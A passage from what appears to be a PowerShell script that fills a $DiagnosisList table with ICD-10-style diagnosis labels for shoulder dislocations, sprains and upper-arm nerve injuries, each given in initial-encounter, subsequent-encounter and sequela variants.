$DiagnosisList.Rows.Add("Dislocation of right acromioclavicular joint, greater than 200% displacement","Dislocation of right acromioclavicular joint, greater than 200% displacement, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of right acromioclavicular joint, greater than 200% displacement","Dislocation of right acromioclavicular joint, greater than 200% displacement, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of left acromioclavicular joint, greater than 200% displacement","Dislocation of left acromioclavicular joint, greater than 200% displacement, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of left acromioclavicular joint, greater than 200% displacement","Dislocation of left acromioclavicular joint, greater than 200% displacement, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of left acromioclavicular joint, greater than 200% displacement","Dislocation of left acromioclavicular joint, greater than 200% displacement, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified acromioclavicular joint, greater than 200% displacement","Dislocation of unspecified acromioclavicular joint, greater than 200% displacement, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified acromioclavicular joint, greater than 200% displacement","Dislocation of unspecified acromioclavicular joint, greater than 200% displacement, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified acromioclavicular joint, greater than 200% displacement","Dislocation of unspecified acromioclavicular joint, greater than 200% displacement, sequela") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of right acromioclavicular joint","Inferior dislocation of right acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of right acromioclavicular joint","Inferior dislocation of right acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of right acromioclavicular joint","Inferior dislocation of right acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of left acromioclavicular joint","Inferior dislocation of left acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of left acromioclavicular joint","Inferior dislocation of left acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of left acromioclavicular joint","Inferior dislocation of left acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of unspecified acromioclavicular joint","Inferior dislocation of unspecified acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of unspecified acromioclavicular joint","Inferior dislocation of unspecified acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Inferior dislocation of unspecified acromioclavicular joint","Inferior dislocation of unspecified acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right acromioclavicular joint","Posterior dislocation of right acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right acromioclavicular joint","Posterior dislocation of right acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right acromioclavicular joint","Posterior dislocation of right acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left acromioclavicular joint","Posterior dislocation of left acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left acromioclavicular joint","Posterior dislocation of left acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left acromioclavicular joint","Posterior dislocation of left acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified acromioclavicular joint","Posterior dislocation of unspecified acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified acromioclavicular joint","Posterior dislocation of unspecified acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified acromioclavicular joint","Posterior dislocation of unspecified acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right sternoclavicular joint","Unspecified subluxation of right sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right sternoclavicular joint","Unspecified subluxation of right sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right sternoclavicular joint","Unspecified subluxation of right sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left sternoclavicular joint","Unspecified subluxation of left sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left sternoclavicular joint","Unspecified subluxation of left sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left sternoclavicular joint","Unspecified subluxation of left sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified sternoclavicular joint","Unspecified subluxation of unspecified sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified sternoclavicular joint","Unspecified subluxation of unspecified sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified sternoclavicular joint","Unspecified subluxation of unspecified sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right sternoclavicular joint","Unspecified dislocation of right sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right sternoclavicular joint","Unspecified dislocation of right sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right sternoclavicular joint","Unspecified dislocation of right sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left sternoclavicular joint","Unspecified dislocation of left sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left sternoclavicular joint","Unspecified dislocation of left sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left sternoclavicular joint","Unspecified dislocation of left sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified sternoclavicular joint","Unspecified dislocation of unspecified sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified sternoclavicular joint","Unspecified dislocation of unspecified sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified sternoclavicular joint","Unspecified dislocation of unspecified sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of right sternoclavicular joint","Anterior subluxation of right sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of right sternoclavicular joint","Anterior subluxation of right sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of right sternoclavicular joint","Anterior subluxation of right sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of left sternoclavicular joint","Anterior subluxation of left sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of left sternoclavicular joint","Anterior subluxation of left sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of left sternoclavicular joint","Anterior subluxation of left sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of unspecified sternoclavicular joint","Anterior subluxation of unspecified sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of unspecified sternoclavicular joint","Anterior subluxation of unspecified sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of unspecified sternoclavicular joint","Anterior subluxation of unspecified sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of right sternoclavicular joint","Anterior dislocation of right sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of right sternoclavicular joint","Anterior dislocation of right sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of right sternoclavicular joint","Anterior dislocation of right sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of left sternoclavicular joint","Anterior dislocation of left sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of left sternoclavicular joint","Anterior dislocation of left sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of left sternoclavicular joint","Anterior dislocation of left sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of unspecified sternoclavicular joint","Anterior dislocation of unspecified sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of unspecified sternoclavicular joint","Anterior dislocation of unspecified sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of unspecified sternoclavicular joint","Anterior dislocation of unspecified sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right sternoclavicular joint","Posterior subluxation of right sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right sternoclavicular joint","Posterior subluxation of right sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right sternoclavicular joint","Posterior subluxation of right sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left sternoclavicular joint","Posterior subluxation of left sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left sternoclavicular joint","Posterior subluxation of left sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left sternoclavicular joint","Posterior subluxation of left sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified sternoclavicular joint","Posterior subluxation of unspecified sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified sternoclavicular joint","Posterior subluxation of unspecified sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified sternoclavicular joint","Posterior subluxation of unspecified sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right sternoclavicular joint","Posterior dislocation of right sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right sternoclavicular joint","Posterior dislocation of right sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right sternoclavicular joint","Posterior dislocation of right sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left sternoclavicular joint","Posterior dislocation of left sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left sternoclavicular joint","Posterior dislocation of left sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left sternoclavicular joint","Posterior dislocation of left sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified sternoclavicular joint","Posterior dislocation of unspecified sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified sternoclavicular joint","Posterior dislocation of unspecified sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified sternoclavicular joint","Posterior dislocation of unspecified sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified parts of right shoulder girdle","Subluxation of unspecified parts of right shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified parts of right shoulder girdle","Subluxation of unspecified parts of right shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified parts of right shoulder girdle","Subluxation of unspecified parts of right shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified parts of left shoulder girdle","Subluxation of unspecified parts of left shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified parts of left shoulder girdle","Subluxation of unspecified parts of left shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified parts of left shoulder girdle","Subluxation of unspecified parts of left shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified parts of unspecified shoulder girdle","Subluxation of unspecified parts of unspecified shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified parts of unspecified shoulder girdle","Subluxation of unspecified parts of unspecified shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified parts of unspecified shoulder girdle","Subluxation of unspecified parts of unspecified shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of right shoulder girdle","Dislocation of unspecified parts of right shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of right shoulder girdle","Dislocation of unspecified parts of right shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of right shoulder girdle","Dislocation of unspecified parts of right shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of left shoulder girdle","Dislocation of unspecified parts of left shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of left shoulder girdle","Dislocation of unspecified parts of left shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of left shoulder girdle","Dislocation of unspecified parts of left shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of unspecified shoulder girdle","Dislocation of unspecified parts of unspecified shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of unspecified shoulder girdle","Dislocation of unspecified parts of unspecified shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified parts of unspecified shoulder girdle","Dislocation of unspecified parts of unspecified shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of right scapula","Subluxation of right scapula, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of right scapula","Subluxation of right scapula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of right scapula","Subluxation of right scapula, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of left scapula","Subluxation of left scapula, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of left scapula","Subluxation of left scapula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of left scapula","Subluxation of left scapula, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified scapula","Subluxation of unspecified scapula, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified scapula","Subluxation of unspecified scapula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified scapula","Subluxation of unspecified scapula, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of right scapula","Dislocation of right scapula, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of right scapula","Dislocation of right scapula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of right scapula","Dislocation of right scapula, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of left scapula","Dislocation of left scapula, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of left scapula","Dislocation of left scapula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of left scapula","Dislocation of left scapula, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified scapula","Dislocation of unspecified scapula, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified scapula","Dislocation of unspecified scapula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified scapula","Dislocation of unspecified scapula, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of other parts of right shoulder girdle","Subluxation of other parts of right shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of other parts of right shoulder girdle","Subluxation of other parts of right shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of other parts of right shoulder girdle","Subluxation of other parts of right shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of other parts of left shoulder girdle","Subluxation of other parts of left shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of other parts of left shoulder girdle","Subluxation of other parts of left shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of other parts of left shoulder girdle","Subluxation of other parts of left shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of other parts of unspecified shoulder girdle","Subluxation of other parts of unspecified shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of other parts of unspecified shoulder girdle","Subluxation of other parts of unspecified shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of other parts of unspecified shoulder girdle","Subluxation of other parts of unspecified shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of right shoulder girdle","Dislocation of other parts of right shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of right shoulder girdle","Dislocation of other parts of right shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of right shoulder girdle","Dislocation of other parts of right shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of left shoulder girdle","Dislocation of other parts of left shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of left shoulder girdle","Dislocation of other parts of left shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of left shoulder girdle","Dislocation of other parts of left shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of unspecified shoulder girdle","Dislocation of other parts of unspecified shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of unspecified shoulder girdle","Dislocation of other parts of unspecified shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other parts of unspecified shoulder girdle","Dislocation of other parts of unspecified shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right shoulder joint","Unspecified sprain of right shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right shoulder joint","Unspecified sprain of right shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right shoulder joint","Unspecified sprain of right shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left shoulder joint","Unspecified sprain of left shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left shoulder joint","Unspecified sprain of left shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left shoulder joint","Unspecified sprain of left shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified shoulder joint","Unspecified sprain of unspecified shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified shoulder joint","Unspecified sprain of unspecified shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified shoulder joint","Unspecified sprain of unspecified shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of right coracohumeral (ligament)","Sprain of right coracohumeral (ligament), initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of right coracohumeral (ligament)","Sprain of right coracohumeral (ligament), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of right coracohumeral (ligament)","Sprain of right coracohumeral (ligament), sequela") + $null = $DiagnosisList.Rows.Add("Sprain of left coracohumeral (ligament)","Sprain of left coracohumeral (ligament), initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of left coracohumeral (ligament)","Sprain of left coracohumeral (ligament), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of left coracohumeral (ligament)","Sprain of left coracohumeral (ligament), sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified coracohumeral (ligament)","Sprain of unspecified coracohumeral (ligament), initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified coracohumeral (ligament)","Sprain of unspecified coracohumeral (ligament), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified coracohumeral (ligament)","Sprain of unspecified coracohumeral (ligament), sequela") + $null = $DiagnosisList.Rows.Add("Sprain of right rotator cuff capsule","Sprain of right rotator cuff capsule, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of right rotator cuff capsule","Sprain of right rotator cuff capsule, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of right rotator cuff capsule","Sprain of right rotator cuff capsule, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of left rotator cuff capsule","Sprain of left rotator cuff capsule, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of left rotator cuff capsule","Sprain of left rotator cuff capsule, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of left rotator cuff capsule","Sprain of left rotator cuff capsule, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified rotator cuff capsule","Sprain of unspecified rotator cuff capsule, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified rotator cuff capsule","Sprain of unspecified rotator cuff capsule, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified rotator cuff capsule","Sprain of unspecified rotator cuff capsule, sequela") + $null = $DiagnosisList.Rows.Add("Superior glenoid labrum lesion of right shoulder","Superior glenoid labrum lesion of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Superior glenoid labrum lesion of right shoulder","Superior glenoid labrum lesion of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superior glenoid labrum lesion of right shoulder","Superior glenoid labrum lesion of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Superior glenoid labrum lesion of left shoulder","Superior glenoid labrum lesion of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Superior glenoid labrum lesion of left shoulder","Superior glenoid labrum lesion of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superior glenoid labrum lesion of left shoulder","Superior glenoid labrum lesion of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Superior glenoid labrum lesion of unspecified shoulder","Superior glenoid labrum lesion of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Superior glenoid labrum lesion of unspecified shoulder","Superior glenoid labrum lesion of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superior glenoid labrum lesion of unspecified shoulder","Superior glenoid labrum lesion of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of right shoulder joint","Other sprain of right shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right shoulder joint","Other sprain of right shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right shoulder joint","Other sprain of right shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of left shoulder joint","Other sprain of left shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left shoulder joint","Other sprain of left shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left shoulder joint","Other sprain of left shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified shoulder joint","Other sprain of unspecified shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified shoulder joint","Other sprain of unspecified shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified shoulder joint","Other sprain of unspecified shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified acromioclavicular joint","Sprain of unspecified acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified acromioclavicular joint","Sprain of unspecified acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified acromioclavicular joint","Sprain of unspecified acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of right acromioclavicular joint","Sprain of right acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of right acromioclavicular joint","Sprain of right acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of right acromioclavicular joint","Sprain of right acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of left acromioclavicular joint","Sprain of left acromioclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of left acromioclavicular joint","Sprain of left acromioclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of left acromioclavicular joint","Sprain of left acromioclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified sternoclavicular joint","Sprain of unspecified sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified sternoclavicular joint","Sprain of unspecified sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified sternoclavicular joint","Sprain of unspecified sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of right sternoclavicular joint","Sprain of right sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of right sternoclavicular joint","Sprain of right sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of right sternoclavicular joint","Sprain of right sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of left sternoclavicular joint","Sprain of left sternoclavicular joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of left sternoclavicular joint","Sprain of left sternoclavicular joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of left sternoclavicular joint","Sprain of left sternoclavicular joint, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of unspecified shoulder girdle","Sprain of other specified parts of unspecified shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of unspecified shoulder girdle","Sprain of other specified parts of unspecified shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of unspecified shoulder girdle","Sprain of other specified parts of unspecified shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of right shoulder girdle","Sprain of other specified parts of right shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of right shoulder girdle","Sprain of other specified parts of right shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of right shoulder girdle","Sprain of other specified parts of right shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of left shoulder girdle","Sprain of other specified parts of left shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of left shoulder girdle","Sprain of other specified parts of left shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other specified parts of left shoulder girdle","Sprain of other specified parts of left shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of unspecified shoulder girdle","Sprain of unspecified parts of unspecified shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of unspecified shoulder girdle","Sprain of unspecified parts of unspecified shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of unspecified shoulder girdle","Sprain of unspecified parts of unspecified shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of right shoulder girdle","Sprain of unspecified parts of right shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of right shoulder girdle","Sprain of unspecified parts of right shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of right shoulder girdle","Sprain of unspecified parts of right shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of left shoulder girdle","Sprain of unspecified parts of left shoulder girdle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of left shoulder girdle","Sprain of unspecified parts of left shoulder girdle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified parts of left shoulder girdle","Sprain of unspecified parts of left shoulder girdle, sequela") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at upper arm level, unspecified arm","Injury of ulnar nerve at upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at upper arm level, unspecified arm","Injury of ulnar nerve at upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at upper arm level, unspecified arm","Injury of ulnar nerve at upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at upper arm level, right arm","Injury of ulnar nerve at upper arm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at upper arm level, right arm","Injury of ulnar nerve at upper arm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at upper arm level, right arm","Injury of ulnar nerve at upper arm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at upper arm level, left arm","Injury of ulnar nerve at upper arm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at upper arm level, left arm","Injury of ulnar nerve at upper arm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of ulnar nerve at upper arm level, left arm","Injury of ulnar nerve at upper arm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at upper arm level, unspecified arm","Injury of median nerve at upper arm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at upper arm level, unspecified arm","Injury of median nerve at upper arm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at upper arm level, unspecified arm","Injury of median nerve at upper arm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of median nerve at upper arm level, right arm","Injury of median nerve at upper arm level, right arm, initial encounter") + $null = 